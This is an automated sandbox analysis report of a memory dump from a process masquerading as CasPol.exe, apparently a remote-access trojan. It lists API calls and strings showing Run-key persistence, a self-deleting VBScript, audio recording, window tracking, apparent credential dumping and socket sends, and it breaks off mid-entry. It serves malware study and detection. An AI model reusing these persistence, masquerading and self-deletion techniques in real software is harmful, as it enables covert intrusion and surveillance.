
Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
API String ID: 4250697656-2665858469
Opcode ID: c9acd2e96293917bda9fc8cf2da187a2ece0c5837e987d224152d2e05bc2ec87
Instruction ID: e3cce03e36166c77d6950284f165d3805ee2b23d785f43ba83868d4dcf2b0e5d
Opcode Fuzzy Hash: c9acd2e96293917bda9fc8cf2da187a2ece0c5837e987d224152d2e05bc2ec87
Instruction Fuzzy Hash: 1651B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D

Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7

Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3

Part of subcall function 0041B59F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE

ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
ExitProcess.KERNEL32 ref: 0040C63E

Strings

fso.DeleteFolder ", xrefs: 0040C519
\update.vbs, xrefs: 0040C3E9
Temp, xrefs: 0040C3EE
"), xrefs: 0040C443
open, xrefs: 0040C62C
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040C330
""", 0, xrefs: 0040C555
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040C2DF
while fso.FileExists(", xrefs: 0040C45A
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040C5E1
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040C56F
exepath, xrefs: 0040C365
On Error Resume Next, xrefs: 0040C427
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040C418
wend, xrefs: 0040C4F7
fso.DeleteFile ", xrefs: 0040C4A8
@CG, xrefs: 0040C33D
`=G, xrefs: 0040C2C9

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-3168347843
Opcode ID: 6219edeefd560ff486394858dd9c1c9d22ab8a13fa2cd0cd7aa5e513517a661c
Instruction ID: 0897204671ac35a997fd8cee39da091aa0ef4b51e820d3179f4d1f6ac17f39c2
Opcode Fuzzy Hash: 6219edeefd560ff486394858dd9c1c9d22ab8a13fa2cd0cd7aa5e513517a661c
Instruction Fuzzy Hash: CD9184316042005AC314FB25D852ABF7799AF91318F10453FF98AA31E2EF7CAD49C69E

Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065

Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3

Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F

ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
ExitProcess.KERNEL32 ref: 0040C287

Strings

fso.DeleteFolder ", xrefs: 0040C1F8
Temp, xrefs: 0040C0B4
pth_unenc, xrefs: 0040BF0A
"), xrefs: 0040C11F
@CG, xrefs: 0040BFCC
open, xrefs: 0040C27A
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040BFA6
.vbs, xrefs: 0040C06F
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040BF55
while fso.FileExists(", xrefs: 0040C136
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040C22F
exepath, xrefs: 0040BFEF
On Error Resume Next, xrefs: 0040C102
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040C0F3
wend, xrefs: 0040C1D2
`=G, xrefs: 0040BF3F
fso.DeleteFile ", xrefs: 0040C183

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-1998216422
Opcode ID: 92fe1a40fcd02945d331df6cf61fadf3435f0996d79fe2ddfa73a677218823cf
Instruction ID: f1dcdd4a9e546d4cb200c8239a9b7392f8c22d31b5939825df829b517cfed74e
Opcode Fuzzy Hash: 92fe1a40fcd02945d331df6cf61fadf3435f0996d79fe2ddfa73a677218823cf
Instruction Fuzzy Hash: 088190316042005BC315FB21D852ABF77A9ABD1308F10453FF986A71E2EF7CAD49869E

Function 0041A1CB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2C2
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2D6
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2FE
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A30F
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A350
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A368
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A37D
SetEvent.KERNEL32 ref: 0041A39A
WaitForSingleObject.KERNEL32(000001F4), ref: 0041A3AB
CloseHandle.KERNEL32 ref: 0041A3BB
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3DD
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3E7

Strings

close audio, xrefs: 0041A3E2
stopped, xrefs: 0041A383
>G, xrefs: 0041A28F, 0041A20F
stop audio, xrefs: 0041A3D8
pause audio, xrefs: 0041A34B
status audio mode, xrefs: 0041A378
open ", xrefs: 0041A256
play audio, xrefs: 0041A2D1
resume audio, xrefs: 0041A363
" type , xrefs: 0041A25B
alias audio, xrefs: 0041A23E

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
API String ID: 738084811-1408154895
Opcode ID: f25ac0aab84e41d79845b7fc1309ac5f9c6375715bc9538c063ff5da4453c961
Instruction ID: 916def08b3adcafa46b043c64cdff30cc67d21214e861a912cda69be872b019d
Opcode Fuzzy Hash: f25ac0aab84e41d79845b7fc1309ac5f9c6375715bc9538c063ff5da4453c961
Instruction Fuzzy Hash: B951C1712442056AD214BB31DC86EBF3B9CDB91758F10043FF456A21E2EF389D9986AF

Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42

Strings

data, xrefs: 00401D2C
RIFF, xrefs: 00401C78
WAVE, xrefs: 00401C98
fmt , xrefs: 00401CA8

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3

Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
GetProcAddress.KERNEL32(00000000), ref: 004064FD
GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
GetProcAddress.KERNEL32(00000000), ref: 00406511
GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
GetProcAddress.KERNEL32(00000000), ref: 00406525
GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
GetProcAddress.KERNEL32(00000000), ref: 00406539
GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
GetProcAddress.KERNEL32(00000000), ref: 0040654D
GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
GetProcAddress.KERNEL32(00000000), ref: 00406561

Strings

RtlReleasePebLock, xrefs: 00406544
LdrEnumerateLoadedModules, xrefs: 00406558
ntdll.dll, xrefs: 004064E8, 004064F3, 0040650D, 00406521, 00406535, 00406549, 0040655D
NtFreeVirtualMemory, xrefs: 0040651C
RtlInitUnicodeString, xrefs: 004064EE
RtlAcquirePebLock, xrefs: 00406530
NtAllocateVirtualMemory, xrefs: 00406508
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 004064E1

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
API String ID: 1646373207-165202446
Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D

Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040BC75
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
_wcslen.LIBCMT ref: 0040BD54
CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000000,00000000), ref: 0040BDF2
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
_wcslen.LIBCMT ref: 0040BE34
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
ExitProcess.KERNEL32 ref: 0040BED0

Strings

BG, xrefs: 0040BCB6
del, xrefs: 0040BE63
open, xrefs: 0040BEB2
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 0040BCFF, 0040BD04, 0040BD37, 0040BDEC, 0040BDF1, 0040BDF8, 0040BE59
BG, xrefs: 0040BCE1
6, xrefs: 0040BD48

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
API String ID: 1579085052-1280438975
Opcode ID: 7e825e1316c52805ca15a361a92a31a639e789ac11549bf6dbe0440ae5e66784
Instruction ID: 2f106158a8217a69bc194f5c9bf89c81f007fa4859a00edafeef48886470f02c
Opcode Fuzzy Hash: 7e825e1316c52805ca15a361a92a31a639e789ac11549bf6dbe0440ae5e66784
Instruction Fuzzy Hash: DC51B1212082006BD609B722EC52E7F77999F81719F10443FF985A66E2DF3CAD4582EE

Function 0041B1CB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0041B1E6
_memcmp.LIBVCRUNTIME ref: 0041B1FE
lstrlenW.KERNEL32(?), ref: 0041B217
FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
_wcslen.LIBCMT ref: 0041B2EB
FindVolumeClose.KERNEL32(?), ref: 0041B30B
GetLastError.KERNEL32 ref: 0041B323
GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
lstrcatW.KERNEL32(?,?), ref: 0041B369
lstrcpyW.KERNEL32(?,?), ref: 0041B378
GetLastError.KERNEL32 ref: 0041B380

Strings

?, xrefs: 0041B27D

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
String ID: ?
API String ID: 3941738427-1684325040
Opcode ID: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
Opcode Fuzzy Hash: c3c2dd9e2d333dcb078036bc87f255ee6d087290d56244cd14bfadd125381673
Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6

Function 0044E21E Relevance: 25.9, APIs: 17, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044E2B0
_free.LIBCMT ref: 0044E2D6
_free.LIBCMT ref: 0044E2FF
_free.LIBCMT ref: 0044E337
_free.LIBCMT ref: 0044E368
_free.LIBCMT ref: 0044E3A9
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044E42A
_free.LIBCMT ref: 0044E443
_wcschr.LIBVCRUNTIME ref: 0044E480
_free.LIBCMT ref: 0044E4EC
_free.LIBCMT ref: 0044E512
_free.LIBCMT ref: 0044E53B
_free.LIBCMT ref: 0044E570
_free.LIBCMT ref: 0044E5A1
_free.LIBCMT ref: 0044E5E2
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E667
_free.LIBCMT ref: 0044E680

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$_wcschr
String ID:
API String ID: 3899193279-0
Opcode ID: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
Opcode Fuzzy Hash: c10670a696248be885c2c5ddf478444a83bcb0538a8bf01727ad035a034c0f59
Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99

Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A

Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F

Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5

Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
Sleep.KERNEL32(00000064), ref: 00412060

Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD

Strings

/stext ", xrefs: 00411D77, 00411E19, 00411EBB
>G, xrefs: 0041227E
>G, xrefs: 00412132
HDG, xrefs: 00412316
HDG, xrefs: 004121F2

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: /stext "$HDG$HDG$>G$>G
API String ID: 1223786279-3931108886
Opcode ID: 94246fb79c68cfcb53b25fd957ccf7951aa449ee5690919d5197481e681c450f
Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
Opcode Fuzzy Hash: 94246fb79c68cfcb53b25fd957ccf7951aa449ee5690919d5197481e681c450f
Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A

Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
LoadLibraryA.KERNEL32(?), ref: 00413EC8
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
FreeLibrary.KERNEL32(00000000), ref: 00413EEF
LoadLibraryA.KERNEL32(?), ref: 00413F27
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
FreeLibrary.KERNEL32(00000000), ref: 00413F40
GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
FreeLibrary.KERNEL32(00000000), ref: 00413F66

Strings

freeaddrinfo, xrefs: 00413E63
\ws2_32, xrefs: 00413EB0
getaddrinfo, xrefs: 00413E44, 00413EE2, 00413F33
getnameinfo, xrefs: 00413E53
\wship6, xrefs: 00413F0F

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
API String ID: 2490988753-744132762
Opcode ID: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
Instruction ID: f97e29e5006070a0e8b03c0efb597ee3aef86c3529fe4be05370ae17daaf5a45
Opcode Fuzzy Hash: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
Instruction Fuzzy Hash: C331C4B1906315ABD320AF65DC44ACBB7ECEF44745F400A2AF844D7201D778DA858AEE

Function 0041B834 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B856
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B89A
RegCloseKey.ADVAPI32(?), ref: 0041BB64

Strings

UninstallString, xrefs: 0041B949
InstallLocation, xrefs: 0041B921
DisplayName, xrefs: 0041B8E1
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041B84C
InstallDate, xrefs: 0041B935
DisplayVersion, xrefs: 0041B90D
Publisher, xrefs: 0041B8F6

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: 169ec82b56f5cfc94b0c0b7d9a60f187521d2f64dce5fc83bd669811bb3caad3
Instruction ID: efd277ba010ae8e34e1206f32af9d70b7e49420e91acd4d446967662cfc0484b
Opcode Fuzzy Hash: 169ec82b56f5cfc94b0c0b7d9a60f187521d2f64dce5fc83bd669811bb3caad3
Instruction Fuzzy Hash: 67813E311082449BD324EB21DC51AEFB7E9FFD4314F10493FB586921E1EF34AA49CA9A

Function 0040A3F4 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 158sleepCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040A456
Sleep.KERNEL32(000001F4), ref: 0040A461
GetForegroundWindow.USER32 ref: 0040A467
GetWindowTextLengthW.USER32(00000000), ref: 0040A470
GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
Sleep.KERNEL32(000003E8), ref: 0040A574

Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84

Strings

4]G, xrefs: 0040A4C0
[, xrefs: 0040A50E
4]G, xrefs: 0040A43B
], xrefs: 0040A508
{ User has been idle for , xrefs: 0040A5AB
4]G, xrefs: 0040A4AA
minutes }, xrefs: 0040A59F

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
API String ID: 911427763-1497357211
Opcode ID: 08c6775225c1be704445fd44d44109dcec563c1a9d4bfb3f89d30f3a95787bd0
Instruction ID: afbd458ed10e5c7c401a96cf43e60d64e5e0c384de04be689a5a7141a0feef4c
Opcode Fuzzy Hash: 08c6775225c1be704445fd44d44109dcec563c1a9d4bfb3f89d30f3a95787bd0
Instruction Fuzzy Hash: 8851B1716043409BC224FB21D85AAAE7794BF84318F40493FF846A72D2DF7C9D55869F

Function 0041CAAE Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
GetCursorPos.USER32(?), ref: 0041CB08
SetForegroundWindow.USER32(?), ref: 0041CB11
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
ExitProcess.KERNEL32 ref: 0041CB84
CreatePopupMenu.USER32 ref: 0041CB8A
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F

Strings

Close, xrefs: 0041CB90

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
Instruction ID: 3771bb7a8ff115e6e52fbd1847cd0ce42a02f589590b945df095e749b0e49bf2
